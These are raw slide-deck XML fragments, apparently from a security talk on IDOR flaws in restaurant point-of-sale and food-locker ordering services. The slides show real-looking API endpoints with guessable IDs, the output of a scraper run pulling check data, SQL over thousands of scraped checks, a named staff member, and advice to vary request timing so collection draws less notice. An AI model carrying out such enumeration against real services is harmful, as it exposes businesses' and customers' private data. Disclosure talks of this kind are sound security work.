                <a:ea typeface="DejaVuSansM Nerd Font Mono" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>api.pay.skytab.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="DejaVuSansM Nerd Font Mono" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="DejaVuSansM Nerd Font Mono" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>api</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="DejaVuSansM Nerd Font Mono" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/v1/merchants/badbe1/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="DejaVuSansM Nerd Font Mono" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>checks?checkNumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="DejaVuSansM Nerd Font Mono" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=62</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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EEBC366E-748E-261F-91B1-302FBBA0FCC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="6765590" y="179211"/>
            <a:ext cx="684703" cy="746299"/>
          </a:xfrm>
          <a:prstGeom prst="leftArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="A35A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BC1D321A-FDE7-3939-824C-A3E306EEE961}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="10096088" y="181972"/>
            <a:ext cx="684703" cy="746299"/>
          </a:xfrm>
          <a:prstGeom prst="leftArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="A35A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2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A8FDB-D0CA-0D70-2F6E-1F8D04CB0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Skytapped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2CD1B-AC86-F476-9A49-4B6913177312}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="362173" y="1226020"/>
            <a:ext cx="114676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skytapped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$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skytapped.py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--config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skytapped.toml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badbe1 --debug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2025-02-02 09:05:01,470 DEBUG Starting retrieval loop from 15 to 34 for merchant badbe1.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2025-02-02 09:05:01,471 INFO Requesting check 15 from API.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2025-02-02 09:05:02,840 DEBUG Updating check data for check 15 in existing record.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2025-02-02 09:05:02,840 INFO API response: [{"name": "SR BELGIAN", "quantity": "1", "price": 679, "modifiers": "W SAUSAGE - 3, W/COFFEE, REGULAR"}, {"name": "SR PANCAKE", "quantity": "1", "price": 679, "modifiers": "NO MEAT, W/COFFEE, REGULAR"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2025-02-02 09:05:02,843 INFO Requesting check 16 from API.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2025-02-02 09:05:04,287 DEBUG Updating check data for check 16 in existing record.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2025-02-02 09:05:04,287 INFO API response: [{"name": "JUICE", "quantity": "1", "price": 399, "modifiers": "LG ORANGE JUICE"}]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895089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1843C-B2E3-5C11-22A4-87D8F75C9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57E7-5E97-C0A8-F8F2-0B8DFC6A1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Skytapped</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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8BF3D-B6DF-47AC-070F-41A59A17F101}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="362173" y="1226020"/>
            <a:ext cx="114676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skytap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=&gt;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select count(*) from checks where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check_date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&gt;= '2025-01-01' and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check_date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'2025-02-01';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4880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A6F079-51B7-0BF9-FCA1-BFBA0AB6C30A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="362173" y="2413337"/>
            <a:ext cx="11829827" cy="4416042"/>
            <a:chOff x="362173" y="2413337"/>
            <a:chExt cx="11829827" cy="44160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951FA90-C566-00DF-8B29-C6135232CCC7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="362173" y="2413337"/>
              <a:ext cx="11467652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skytap</a:t>
              </a:r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=&gt; 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SELECT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c.check_date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TO_CHAR(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c.check_date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'Day') AS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day_of_week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TO_CHAR(SUM((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check_obj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-&gt;&gt;'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amountDue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')::INTEGER) / 100.0, 'FM$999,999.00') AS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total_sales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FROM checks c CROSS JOIN LATERAL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jsonb_array_elements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(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c.check_details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-&gt;'checks') AS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check_obj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WHERE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c.check_details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IS NOT NULL AND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c.check_date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&gt;= '2025-01-01' AND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c.check_date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&lt; '2025-02-01' GROUP BY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c.check_date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ORDER BY </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="20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total_sales</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="20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 DESC LIMIT 5;</a:t>
              </a:r>
            </a:p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2025-01-18 | Saturday    | $3,336.44</a:t>
              </a:r>
            </a:p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2025-01-11 | Saturday    | $3,179.49</a:t>
              </a:r>
            </a:p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2025-01-25 | Saturday    | $3,101.96</a:t>
              </a:r>
            </a:p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2025-01-12 | Sunday      | $3,040.06</a:t>
              </a:r>
            </a:p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2025-01-04 | Saturday    | $2,820.33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412FBE-2997-99D9-C74C-DD039F051F55}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6092414" y="6244604"/>
              <a:ext cx="60995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/>
                <a:t>This is for observed checks through IDOR scraping.</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="r"/>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0"/>
                <a:t>I used ChatGPT to assist with SQL query writing.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97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B0A9EA3-2273-F976-9D96-F063F4B73747}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="277921" y="44448"/>
            <a:ext cx="3444225" cy="3290162"/>
            <a:chOff x="277921" y="44448"/>
            <a:chExt cx="3444225" cy="3290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85B209-887D-0938-FF3F-D08ED47B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594" y="1464151"/>
              <a:ext cx="2074879" cy="187045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E4E98B-55B0-5FDD-0918-B46842AF495E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="277921" y="44448"/>
              <a:ext cx="344422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.SF NS"/>
                </a:rPr>
                <a:t>Egg and Home Fries (Senior)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22863F-A8E3-4566-A45B-AF83A3C7EC70}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="277921" y="3449197"/>
            <a:ext cx="3444225" cy="3281436"/>
            <a:chOff x="277921" y="3449197"/>
            <a:chExt cx="3444225" cy="32814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104F13-8F2D-5591-43E8-8FA7D28D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3344" y="4860174"/>
              <a:ext cx="2038763" cy="187045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094337-2313-3FD5-4000-F5767997325C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="277921" y="3449197"/>
              <a:ext cx="344422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.SF NS"/>
                </a:rPr>
                <a:t>Eggs, bacon, sausage (2X3)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B3441F-8169-AB81-01A5-E4AB2BFFC326}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3883201" y="42114"/>
            <a:ext cx="3743971" cy="3308486"/>
            <a:chOff x="3883201" y="42114"/>
            <a:chExt cx="3743971" cy="33084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D8C4A5C-F689-F372-66F9-8D0F4CA3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000" contrast="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40823" y="1464151"/>
              <a:ext cx="2112600" cy="188644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B574DA-514C-EB33-470D-798C92CA1182}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3883201" y="42114"/>
              <a:ext cx="374397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.SF NS"/>
                </a:rPr>
                <a:t>Pancake and Sausage (Senior)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B89A89-5457-B5F1-6897-65714B0871F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3883201" y="3449198"/>
            <a:ext cx="3743971" cy="3366688"/>
            <a:chOff x="3883201" y="3449198"/>
            <a:chExt cx="3743971" cy="33666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C36E03-9AAD-E109-CB29-511A2051A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1374" y="4576153"/>
              <a:ext cx="2291497" cy="22397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871C31-6FA1-57BD-C69E-59D6C721CF0D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3883201" y="3449198"/>
              <a:ext cx="374397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.SF NS"/>
                </a:rPr>
                <a:t>Cheeseburger and fries (senior)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51ADC5-8B6E-1DF7-F93D-4E08C0FF2E5F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8080476" y="44447"/>
            <a:ext cx="3743971" cy="5248315"/>
            <a:chOff x="8080476" y="44447"/>
            <a:chExt cx="3743971" cy="52483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DACA70-BFC4-C8BB-94C7-05AD4B0A2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3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7906" y="1565237"/>
              <a:ext cx="2009108" cy="372752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315228-BE1B-4AE8-587D-2FBD2031C720}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8080476" y="44447"/>
              <a:ext cx="374397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.SF NS"/>
                </a:rPr>
                <a:t>Awful Awful (milkshake)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775B74-B7B9-D2EA-753B-F470947FDE26}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7897113" y="5605818"/>
            <a:ext cx="41106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effectLst/>
                <a:latin typeface=".SF NS"/>
              </a:rPr>
              <a:t>👴🏻👴🏻👴🏻</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13257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8A753A-9C21-B7E2-398E-C2D9BE038143}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="652852" y="4824805"/>
            <a:ext cx="10154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Most items in order: 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69A29-B466-4145-5C73-82606BCDB621}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="652853" y="472204"/>
            <a:ext cx="10154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Best sales day: Sat. January 18, $3,336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AE249-1C1F-BB9B-B64D-BAF3F19D4192}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="652853" y="1560354"/>
            <a:ext cx="10154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Busiest day of the week: Saturday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87A0F-5F17-F255-189B-073572D19319}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="652853" y="2648504"/>
            <a:ext cx="10154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Most expensive order: $145.28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B3310E-64C9-81EE-08B4-47CE5ABCC282}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="652852" y="3736654"/>
            <a:ext cx="101548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Busiest waitstaff: Samantha M.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33174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07797-A5E4-5028-997E-77AFBED1D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46" y="521284"/>
            <a:ext cx="5562195" cy="2850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7090B-B03B-A43C-20F8-32049E1D1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667" y="1910220"/>
            <a:ext cx="3763557" cy="4947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5FF390-F548-B053-186E-97373B766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329" y="3825101"/>
            <a:ext cx="3595540" cy="2850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D9381A-48E3-5739-9C23-2C8A2F7B7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59" y="254441"/>
            <a:ext cx="4512316" cy="3263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CB6C-E49A-0EE3-B742-3739CBA2E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35" y="3403723"/>
            <a:ext cx="3632651" cy="3454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6305ED-AB2D-7688-D966-B48B92FA80D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="909022" y="654430"/>
            <a:ext cx="354464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effectLst/>
                <a:latin typeface=".SF NS"/>
              </a:rPr>
              <a:t>x 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ABD39-7BC0-EC53-7A2A-5811EE0C2F0B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1460792" y="4911707"/>
            <a:ext cx="354464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b="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface=".SF NS"/>
              </a:rPr>
              <a:t>x 5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39865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0F1B4-F68E-B398-EED9-F7F67A7D3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0"/>
            <a:ext cx="10890929" cy="4531489"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Watch for IDOR vulnerabilities in all things.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 creative in how you collect data with regard to timing and frequency of requests.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Always consider the collective impact when assessing vulnerabilities.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1101544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lhouette of a power line&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{126B09B3-2421-A05F-9F92-6A526B58B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14814" r="-274" b="16744"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="-73152" y="0"/>
            <a:ext cx="12265152" cy="6858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9F7CF-9205-C189-ECDA-DB9AA1E32439}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-36576" y="4494586"/>
            <a:ext cx="121920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0" b="1" dirty="0">
                <a:latin typeface="Grandview" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial Black" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>NASHVILLE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="179123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EE017B-ECA4-07C1-1D86-12F6B2BF3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talk about IDOR vulnerabilities.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Screenshot from TechCrunch.com with article title &quot;Threat actor says he scraped 49M Dell customer addresses before the company found out.&quot;">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{100B2479-7BF4-6483-0ECE-C0C92AA31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242" y="120291"/>
            <a:ext cx="5074706" cy="66174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623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food truck parked on a sidewalk&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7AB57087-8D7D-2DD9-9E63-A22D7027B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0" r="23295" b="13612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28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ockers with black letters&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B714F0C-699A-BB42-E467-367BF53F4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r="7500"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="0" y="0"/>
            <a:ext cx="7861300" cy="68580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4F54E99-1CBD-98A4-F52A-223CA7F39C7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8280400" y="561706"/>
            <a:ext cx="3633882" cy="4950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There were no people inside. Just a series of lockers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A1-G4 and H1-N4. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1416686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1536A9-E01E-7523-E795-607C671E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3" y="0"/>
            <a:ext cx="71132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108C62-0040-426A-4E36-1744F937307A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6197600" y="1720840"/>
            <a:ext cx="55245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effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>https://mobile-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>checkin.cloudkitchens.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>/order/ZSXPLWM</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1851137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bag in a white locker&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7A7FB35-E282-06AB-F327-4901F384E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6482"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="656309" y="73941"/>
            <a:ext cx="6146800" cy="6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20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D55639-B4D5-A0AA-CC4D-C1B57394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86143"/>
            <a:ext cx="12014200" cy="6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18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77E30-582F-CF7B-B276-45FBB2A1F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DC95E-6C9B-4855-165E-E0219528E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3" y="0"/>
            <a:ext cx="7113233" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2" descr="A screenshot of a chat&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E022D11-2D92-9F55-CA9F-70BE853B9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1" r="15728" b="16482"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6103526" y="277792"/>
            <a:ext cx="6015170" cy="65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3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583D32-A1F3-1E40-864C-6BE115C557B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="508000" y="264636"/>
            <a:ext cx="1117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/>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>mobile-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>checkin.cloudkitchens.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>/order/ZSXPLWM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/>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>mobile-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>checkin.cloudkitchens.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>/order/LCVGQFW</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>mobile-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" i="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>checkin.cloudkitchens.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>/order/YHVBGDZ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/>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>mobile-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>checkin.cloudkitchens.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>/order/PFFAEAD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D6E3D-16E2-510F-6C54-A92AB51038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722"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="456190" y="2653792"/>
            <a:ext cx="11227810" cy="38280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FD852A-62C7-DE96-825B-34CCE2602BFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="0" y="2572960"/>
            <a:ext cx="12192000" cy="4204208"/>
            <a:chOff x="0" y="2572960"/>
            <a:chExt cx="12192000" cy="42042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5A8CEA-5C1E-86D9-268A-A7D0E6EC15B4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="2572960"/>
              <a:ext cx="12192000" cy="420420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40286-BB88-2862-5F60-71F0A088752D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="794719" y="3894121"/>
              <a:ext cx="10550752" cy="172354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182880" tIns="182880" rIns="182880" bIns="18288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https://</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="4400" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>api.cloudkitchens.com</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="4400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="4400" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>checkin</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="4400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="4400" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>mci_order</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="4400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>/PFFAEAD</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Left Arrow 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9B5F5D2-35B4-AE26-64EB-28C90D9F723D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="2705308" y="5398516"/>
            <a:ext cx="2431229" cy="1280160"/>
          </a:xfrm>
          <a:prstGeom prst="leftArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="A35A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CC376F-F68E-FD7D-1E99-87E1E775897C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="828548" y="469255"/>
            <a:ext cx="10452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+mj-lt"/>
              </a:rPr>
              <a:t>PFFAEAD</a:t>
